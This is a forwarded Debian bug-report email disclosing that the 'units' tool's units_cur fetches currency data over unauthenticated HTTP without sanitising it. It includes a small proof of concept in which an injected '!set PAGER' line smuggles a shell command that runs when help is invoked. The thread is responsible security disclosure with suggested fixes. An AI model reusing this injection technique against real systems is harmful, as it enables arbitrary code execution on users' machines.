Control: forwarded adri...@gnu.org Hi Adrian,
I thought you’d be interested in this bug report... A straightforward partial
fix would be to switch to the https URIs, better still would be to add
certificate validation of some sort, but I think a real fix would involve
format validation and data sanitization (as Jakub mentions).
Regards,
Stephen
On Tue, 3 Jul 2018 18:55:40 +0200, Jakub Wilk <jw...@jwilk.net> wrote:
> Package: units
> Version: 2.17-1
> Tags: security
>
> units_cur does no sanitization of the data it downloads. Malicious
> operators of the servers or man-in-the-middle attackers[*] could exploit
> this to execute arbitrary code.
>
> As a proof of concept, I patched units_cur to emulate Yahoo returning
> malicious data. After updating the data, /var/lib/units/currency.units
> looks like this:
>
> southkoreawon 1|0
> !set PAGER cowsay${IFS}pwned;exit;
> # US$
>
> And this happens:
>
> $ units
> Currency exchange rates from finance.yahoo.com on 2018-07-03
> 3048 units, 109 prefixes, 109 nonlinear units
>
> You have: help kg
> _______
> < pwned >
> -------
> \ ^__^
> \ (oo)\_______
> (__)\ )\/\
> ||----w |
> || ||
>
>
> [*] Conveniently, all the data in downloaded over HTTP, so there's no
> authentication.
>
> --
> Jakub Wilk
pgpYuAsSw91U3.pgp
Description: OpenPGP digital signature
